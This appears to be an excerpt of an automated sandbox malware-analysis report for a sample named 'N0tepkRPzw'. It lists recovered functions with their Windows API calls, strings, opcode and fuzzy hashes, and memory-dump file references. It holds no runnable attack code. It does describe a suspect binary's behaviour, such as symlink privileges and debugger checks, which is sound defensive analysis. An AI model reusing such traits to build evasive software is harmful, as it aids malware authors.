Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030

Function 00D6DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 407858999a0fc798dc5ebcd2d9e64b539132fd9b7f63aea272d63f0be7d0e0ed
Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
Opcode Fuzzy Hash: 407858999a0fc798dc5ebcd2d9e64b539132fd9b7f63aea272d63f0be7d0e0ed
Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030

Function 00D6DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 07a1eef3a8ef63ba0e50ce232784e42cb1f449811e27081eecdd3e4a342433ad
Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
Opcode Fuzzy Hash: 07a1eef3a8ef63ba0e50ce232784e42cb1f449811e27081eecdd3e4a342433ad
Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030

Function 00D59EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00D59104,?,?,-00001964), ref: 00D59EC2

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: e2b925b72c156ce36191db02f8fedff8c3c5ff13e72956961996f70e1a292efb
Instruction ID: 025f364d5bafede29822ecfb494a772cff248922b2f81be93e99bf0c6ebc4bc6
Opcode Fuzzy Hash: e2b925b72c156ce36191db02f8fedff8c3c5ff13e72956961996f70e1a292efb
Instruction Fuzzy Hash: F4B011300B020A8A8E002F30CC088283A20EA22B0A32082A0A00ACA0A0CB22C002AB00

Function 00D6A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00D6A587,C:\Users\user\Desktop,00000000,00D9946A,00000006), ref: 00D6A326

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 30d50a654ef0d79091859185056d34f4f696cfe5ae5c737919e02347cb6e5e9e
Instruction ID: dfd001cdf7f1fa31d58d4db681d3b71587b3839e29f222f5ee0d11d337ffd0bb
Opcode Fuzzy Hash: 30d50a654ef0d79091859185056d34f4f696cfe5ae5c737919e02347cb6e5e9e
Instruction Fuzzy Hash: A2A012301A4206568A000B30CC0DC1576505760F02F0086207006C00A0CB308814A710

Non-executed Functions

Function 00D6B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D6B971
EndDialog.USER32(?,00000006), ref: 00D6B984
GetDlgItem.USER32(?,0000006C), ref: 00D6B9A0
SetFocus.USER32(00000000), ref: 00D6B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00D6B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D6BA18
FindFirstFileW.KERNEL32(?,?), ref: 00D6BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6BA94
_swprintf.LIBCMT ref: 00D6BAC4

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D6BAD7
FindClose.KERNEL32(00000000), ref: 00D6BADE
_swprintf.LIBCMT ref: 00D6BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 00D6BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D6BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D6BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6BBC9
_swprintf.LIBCMT ref: 00D6BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D6BC08
_swprintf.LIBCMT ref: 00D6BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00D6BC6F

Part of subcall function 00D6A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D6A662
Part of subcall function 00D6A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D8E600,?,?), ref: 00D6A6B1

Strings

REPLACEFILEDLG, xrefs: 00D6B907
%s %s %s, xrefs: 00D6BAB2, 00D6BBE7
%s %s, xrefs: 00D6BB29, 00D6BC4E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: d822a0bb07acf02dacdf9c6fb1b8fb45b701f78603eabe2a40ced71eda1e8b71
Instruction ID: f509a6d7b23310bbc7a866b0b0e55543b872209b0287e1950983668ba5c94a9a
Opcode Fuzzy Hash: d822a0bb07acf02dacdf9c6fb1b8fb45b701f78603eabe2a40ced71eda1e8b71
Instruction Fuzzy Hash: 6A919372148348BFE621ABA4DC49FFB77ACEB49B11F04091AF789D2191D77196048B72

Function 00D5718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D57191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D572F1
CloseHandle.KERNEL32(00000000), ref: 00D57301

Part of subcall function 00D57BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57C04
Part of subcall function 00D57BF5: GetLastError.KERNEL32 ref: 00D57C4A
Part of subcall function 00D57BF5: CloseHandle.KERNEL32(?), ref: 00D57C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D5730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D5741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D57446
CloseHandle.KERNEL32(?), ref: 00D57457
GetLastError.KERNEL32 ref: 00D57467
RemoveDirectoryW.KERNEL32(?), ref: 00D574B3
DeleteFileW.KERNEL32(?), ref: 00D574DB

Strings

SeRestorePrivilege, xrefs: 00D571B2
\??\, xrefs: 00D57217
UNC\, xrefs: 00D5723C
SeCreateSymbolicLinkPrivilege, xrefs: 00D571BC

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: d4eec29b13eea449ee3137e052ecc2907c995bb9b89b2c317318acf31ddb9b7c
Instruction ID: ab4724cfe8abf8a4358017cb8f41215584d6288977d199f161120d685ee0a5bc
Opcode Fuzzy Hash: d4eec29b13eea449ee3137e052ecc2907c995bb9b89b2c317318acf31ddb9b7c
Instruction Fuzzy Hash: 70B1EF71904214AADF21DF64EC45BEEBBB8EF04701F144169FD49E7242E734AA49CB71

Function 00D53281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D5328A
_memcmp.LIBVCRUNTIME ref: 00D53377

Strings

h%u, xrefs: 00D5362D
hc%u, xrefs: 00D5367B
CMT, xrefs: 00D53990

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: a824219ec2db800d07d1e5739682622b399f83d798475b2be029608ad0bf0260
Instruction ID: 6950cbc33db5119d8af256ae9cb8f955a33c8d10dba6ab4975dc02be84fef522
Opcode Fuzzy Hash: a824219ec2db800d07d1e5739682622b399f83d798475b2be029608ad0bf0260
Instruction Fuzzy Hash: A8327C715143849FDF15DF64C895AEA3BA5EF15341F08447AFD8A8B282EB70AA4CCB70

Function 00D7D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D7D154

Strings

1#SNAN, xrefs: 00D7E353
1#INF, xrefs: 00D7E361
1#QNAN, xrefs: 00D7E35A
1#IND, xrefs: 00D7E34C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: cdbf94d527c51143d790d195fe93b0a593145a98256051402945e616e66f4197
Instruction ID: df7979230c218b8f415158cae148b0e82aa67fdb6f4cdaf6c4a2539f53d3ade2
Opcode Fuzzy Hash: cdbf94d527c51143d790d195fe93b0a593145a98256051402945e616e66f4197
Instruction Fuzzy Hash: 6CC23C71E086288FDB25CE28DD407E9B7B6EF48315F1981EAD44DE7241E774AE818F60

Function 00D527E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D527F1
_strlen.LIBCMT ref: 00D52D7F

Part of subcall function 00D6137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D5B652,00000000,?,?,?,0001047C), ref: 00D61396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D52EE0

Strings

CMT, xrefs: 00D52F13

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: a084a10274835cd468e6fff58c66d1a91fa6e22597df8808b0a68d0fb9515392
Instruction ID: f87a13d7f43fa518611454fae49745582c80c03117c07010c6f35f2756aa4943
Opcode Fuzzy Hash: a084a10274835cd468e6fff58c66d1a91fa6e22597df8808b0a68d0fb9515392
Instruction Fuzzy Hash: D262C0716106848FDF18DF68C8856FA3BE1EF55305F09457DEC9A8B282EA70A94DCB70

Function 00D7866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D78767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D78771
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D7877E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 904a1ea998f48434a45cedeca4a044a5b87b1faceed59e649dad9f91cb14b37a
Instruction ID: 560f79865b86739beabff44a7f5d51b23be7c31ac635757f5e30c9b7fe061f50
Opcode Fuzzy Hash: 904a1ea998f48434a45cedeca4a044a5b87b1faceed59e649dad9f91cb14b37a
Instruction Fuzzy Hash: 8E31C6759513289BCB21DF64D889B9CB7B4FF08710F5041EAE80CA7251EB309F858F55

Function 00D7CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: bc7bdfed8cdbf9efb861cd514f1298051c01f4f6179c155216dc0d991f1e7abe
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: C1021E71E111199FDF24CFA9C8806ADFBF1EF48314F29916EE919E7344E731A9418B90

Function 00D6A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D6A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,00D8E600,?,?), ref: 00D6A6B1

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: f953dd78757c5be04a8140e8fc5f572e197403658923ead728c100709500cb0a
Instruction ID: 22e28c575bec048f55dd6463280cda62cd422ada3abe71a50170bda4b3f4f18f
Opcode Fuzzy Hash: f953dd78757c5be04a8140e8fc5f572e197403658923ead728c100709500cb0a
Instruction Fuzzy Hash: 92010C76510308AADB109FA5DC49F9B77BDEF1A721F005822BA08E7250E7709A24CBB5

Function 00D56EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00D6117C,?,00000200), ref: 00D56EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D56EEA

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5592f1331757217645ced868a576fb8481c46b9f6734fb8c17df8983fba7816f
Instruction ID: 834a0745dd6e3a1193baa81d10954d95a722811a0c5083be99c3851a9d8651c3
Opcode Fuzzy Hash: 5592f1331757217645ced868a576fb8481c46b9f6734fb8c17df8983fba7816f
Instruction Fuzzy Hash: FCD09E35294302BAEE510A74CC06F267B946755B42F20C514BA56D90D0C970D0189735

Function 00D81194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D8118F,?,?,00000008,?,?,00D80E2F,00000000), ref: 00D813C1

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
